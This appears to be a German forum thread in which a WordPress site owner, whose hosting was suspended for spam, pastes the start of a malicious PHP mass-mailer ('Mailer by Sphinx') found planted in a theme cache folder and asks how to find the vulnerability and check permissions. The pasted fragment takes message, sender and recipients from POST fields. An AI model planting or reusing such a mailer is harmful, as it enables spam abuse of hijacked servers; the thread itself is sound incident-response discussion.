Spamversand - Blog gehackt? Trojaner?

Hallo,

im Cache-Verzeichnis meines Themes befindet sich erneut eine Datei, welche massenhaft Spam an kolumbianische Adressen verschickt. Der Hoster hat mein Paket gesperrt. Erst vor einer Woche hatte ich dies. Damals löschte ich die Datei sowie einen Trojaner und updatete mein Wordpress. Nun sind aber Wordpress und alle Plugins aktuell. Wie finde ich die offenbar immer noch vorhandene Sicherheitslücke?

Die schadhafte Datei sieht wie folgt aus:

<?php
@set_time_limit(0);
if(isset($_POST['Enoc']))
{
$message = $_POST['html'];
$subject = $_POST['assunto'];
$de = $_POST['de'];
$nombre = $_POST['RealName'];
$ellos = $_POST['ellos'];

$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);

}else{
$testa ="";
$message = "<html><body><h1>hola my friend, How are u ?</h1></body></html>";
$subject = $_SERVER["HTTP_HOST"];
$nombre = "Moe Greene";
$de = "is_a_t@unenvio.com";
$ellos = "mail@hotmail.com";
}
?>
<html>
<head>
<title> Mailer by Sphinx</title></head>

 

Danke für die Zielvorgaben. Nur welche Tools sind dafür geeignet?

Rechteprüfung:
Gibt es irgendwo eine Übersicht, wie die Rechte gesetzt sein müssen?

Dateiprüfung:
Leider ist das Webverzeichnis gesperrt, sodass ich keine externen Tools nutzen kann. Was nutzt man dann?

 

Nein, ich bin bei Hosteurope und bezahle gut dafür.

Zugriff auf meine Dateien habe ich per VPN-Tunnel weiterhin. Nur externe Tools, wie Google Webmaster gehen nicht, wollte nur vorbeugen, dass solche Vorschläge kommen.